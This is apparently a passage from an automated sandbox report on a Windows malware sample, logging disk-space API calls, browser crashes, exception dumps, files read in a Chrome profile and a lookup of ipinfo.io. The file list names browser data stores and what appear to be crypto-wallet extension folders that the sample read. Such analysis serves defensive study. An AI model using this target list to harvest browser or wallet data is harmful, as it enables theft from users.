GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10124828672
free_bytes_available: 10124828672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0
Application Crash Process iexplore.exe with pid 3012 crashed
Application Crash Process chrome.exe with pid 2856 crashed
Application Crash Process chrome.exe with pid 1308 crashed
Application Crash Process chrome.exe with pid 1156 crashed
Application Crash Process firefox.exe with pid 2980 crashed
Application Crash Process firefox.exe with pid 2580 crashed
Application Crash Process firefox.exe with pid 2964 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 113308432
registers.edi: 95063068
registers.eax: 113308432
registers.ebp: 113308512
registers.edx: 31
registers.ebx: 113308796
registers.esi: 2147746133
registers.ecx: 95342760
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7167540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716752ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x71750ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 77583968
registers.edi: 1953561104
registers.eax: 77583968
registers.ebp: 77584048
registers.edx: 1
registers.ebx: 7160388
registers.esi: 2147746133
registers.ecx: 1610980466
1 0 0

__exception__

 stacktrace: 

        
      
      
      

    
  
    
      
        exception.symbol:
        
        

      
        exception.exception_code:
        0xc0000005
        

      
        exception.address:
        0x0
        

      
    
  
    
      
        registers.r14:
        185461136
        

      
        registers.r15:
        185461576
        

      
        registers.rcx:
        1296
        

      
        registers.rsi:
        17302540
        

      
        registers.r10:
        0
        

      
        registers.rbx:
        108022336
        

      
        registers.rsp:
        185460296
        

      
        registers.r11:
        185464832
        

      
        registers.r8:
        1994752396
        

      
        registers.r9:
        0
        

      
        registers.rdx:
        1444
        

      
        registers.r12:
        6927568
        

      
        registers.rbp:
        185460448
        

      
        registers.rdi:
        6927312
        

      
        registers.rax:
        5975552
        

      
        registers.r13:
        185461008
        

      
    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
__exception__

  
  
    
      
    
  


  
    
      stacktrace:
      
        
          
0x3b2e04
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

        
      
      
      

    
  
    
      
        exception.instruction_r:
        ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76
        

      
        exception.instruction:
        call qword ptr [rip + 0x91f16]
        

      
        exception.exception_code:
        0xc0000005
        

      
        exception.symbol:
        
        

      
        exception.address:
        0x3b2e04
        

      
    
  
    
      
        registers.r14:
        185003552
        

      
        registers.r15:
        185003992
        

      
        registers.rcx:
        1476
        

      
        registers.rsi:
        17302540
        

      
        registers.r10:
        0
        

      
        registers.rbx:
        107495136
        

      
        registers.rsp:
        185002728
        

      
        registers.r11:
        185007248
        

      
        registers.r8:
        1994752396
        

      
        registers.r9:
        0
        

      
        registers.rdx:
        1496
        

      
        registers.r12:
        33535264
        

      
        registers.rbp:
        185002864
        

      
        registers.rdi:
        33272512
        

      
        registers.rax:
        3878400
        

      
        registers.r13:
        185003424
        

      
    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
__exception__

  
  
    
      
    
  


  
    
      stacktrace:
      
        
          
0x5b2e04
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

        
      
      
      

    
  
    
      
        exception.instruction_r:
        ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76
        

      
        exception.instruction:
        call qword ptr [rip + 0x91f16]
        

      
        exception.exception_code:
        0xc0000005
        

      
        exception.symbol:
        
        

      
        exception.address:
        0x5b2e04
        

      
    
  
    
      
        registers.r14:
        181596304
        

      
        registers.r15:
        181596744
        

      
        registers.rcx:
        1312
        

      
        registers.rsi:
        17302540
        

      
        registers.r10:
        0
        

      
        registers.rbx:
        108175920
        

      
        registers.rsp:
        181595480
        

      
        registers.r11:
        181600000
        

      
        registers.r8:
        1994752396
        

      
        registers.r9:
        0
        

      
        registers.rdx:
        1412
        

      
        registers.r12:
        32552208
        

      
        registers.rbp:
        181595616
        

      
        registers.rdi:
        32289456
        

      
        registers.rax:
        5975552
        

      
        registers.r13:
        181596176
        

      
    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
__exception__

  
  
    
      
    
  


  
    
      stacktrace:
      
        
          
0xcd1f04
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

        
      
      
      

    
  
    
      
        exception.instruction_r:
        83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07
        

      
        exception.instruction:
        cmp dword ptr [rip + 0x2d18d], 0
        

      
        exception.exception_code:
        0xc0000005
        

      
        exception.symbol:
        
        

      
        exception.address:
        0xcd1f04
        

      
    
  
    
      
        registers.r14:
        8910816
        

      
        registers.r15:
        8910320
        

      
        registers.rcx:
        48
        

      
        registers.rsi:
        14752640
        

      
        registers.r10:
        0
        

      
        registers.rbx:
        0
        

      
        registers.rsp:
        8909368
        

      
        registers.r11:
        8911568
        

      
        registers.r8:
        1994752396
        

      
        registers.r9:
        0
        

      
        registers.rdx:
        8796092887632
        

      
        registers.r12:
        8910151
        

      
        registers.rbp:
        8909488
        

      
        registers.rdi:
        100
        

      
        registers.rax:
        13442816
        

      
        registers.r13:
        2
        

      
    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
__exception__

  
  
    
      
    
  


  
    
      stacktrace:
      
        
          
0xcd1f04
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

        
      
      
      

    
  
    
      
        exception.instruction_r:
        83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07
        

      
        exception.instruction:
        cmp dword ptr [rip + 0x2d18d], 0
        

      
        exception.exception_code:
        0xc0000005
        

      
        exception.symbol:
        
        

      
        exception.address:
        0xcd1f04
        

      
    
  
    
      
        registers.r14:
        10222480
        

      
        registers.r15:
        10221984
        

      
        registers.rcx:
        48
        

      
        registers.rsi:
        14704704
        

      
        registers.r10:
        0
        

      
        registers.rbx:
        0
        

      
        registers.rsp:
        10221032
        

      
        registers.r11:
        10223232
        

      
        registers.r8:
        1994752396
        

      
        registers.r9:
        0
        

      
        registers.rdx:
        8796092887632
        

      
        registers.r12:
        10221815
        

      
        registers.rbp:
        10221152
        

      
        registers.rdi:
        100
        

      
        registers.rax:
        13442816
        

      
        registers.r13:
        2
        

      
    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
__exception__

  
  
    
      
    
  


  
    
      stacktrace:
      
        
          
0xbc1f04
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030

        
      
      
      

    
  
    
      
        exception.instruction_r:
        83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07
        

      
        exception.instruction:
        cmp dword ptr [rip + 0x2d18d], 0
        

      
        exception.exception_code:
        0xc0000005
        

      
        exception.symbol:
        
        

      
        exception.address:
        0xbc1f04
        

      
    
  
    
      
        registers.r14:
        9826824
        

      
        registers.r15:
        8791498856048
        

      
        registers.rcx:
        48
        

      
        registers.rsi:
        8791498787712
        

      
        registers.r10:
        0
        

      
        registers.rbx:
        0
        

      
        registers.rsp:
        9826456
        

      
        registers.r11:
        9829840
        

      
        registers.r8:
        1994752396
        

      
        registers.r9:
        0
        

      
        registers.rdx:
        8796092887632
        

      
        registers.r12:
        15964672
        

      
        registers.rbp:
        9826576
        

      
        registers.rdi:
        66166816
        

      
        registers.rax:
        12328704
        

      
        registers.r13:
        9827416
        

      
    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka\CURRENT
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    domain
                                    ipinfo.io
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
